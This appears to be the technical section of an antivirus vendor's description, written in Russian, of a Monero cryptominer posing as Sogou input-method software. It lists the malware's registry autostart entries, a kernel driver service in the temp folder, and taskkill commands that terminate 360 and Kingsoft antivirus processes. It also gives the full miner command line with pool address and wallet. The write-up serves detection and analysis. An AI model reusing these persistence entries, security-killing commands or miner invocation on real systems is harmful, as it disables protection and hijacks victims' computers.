Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'SogouCom' = '<Полный путь к файлу>'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'SogouCom' = '<Полный путь к файлу>'
- [<HKLM>\SYSTEM\ControlSet001\Services\otvfx258113208092] 'ImagePath' = '%TEMP%\GA5kqtZ.sys'
- '<SYSTEM32>\taskkill.exe' /f /im 360rps.exe /im ZhuDongFangYu.exe /im 360EntClient.exe /im 360sd.exe /im 360rp.exe /im 360tray.exe /im 360rps.exe
- '<SYSTEM32>\taskkill.exe' /f /im kxescore.exe /im knbcenter.exe /im kxetray.exe
- 360tray.exe
- NtOpenProcess, драйвер-обработчик: GA5kqtZ.sys
- <Текущая директория>\SogouComM.exe
- %TEMP%\GA5kqtZ.sys
- %APPDATA%\SogouPY.users\acc.dat.sgbak
- %TEMP%\GA5kqtZ.sys
- %TEMP%\GA5kqtZ.sys
- %APPDATA%\SogouPY.users\acc.dat.sgbak в %APPDATA%\SogouPY.users\acc.dat
- 'po##.#inexmr.com':7777
- DNS ASK po##.#inexmr.com
- ClassName: '' WindowName: ''
- '<Текущая директория>\SogouComM.exe' -a cryptonight -o pool.minexmr.com:7777 -u 49UFtcDaDaMVC2f1SDkivEgUiAU4pB4B1XPqa96oxTXyF9fp7GvydE8RnUexLYQYobWaoe8iA6Tur9JACrH2vtCR44ZGA9G -p x -k --donate-level=1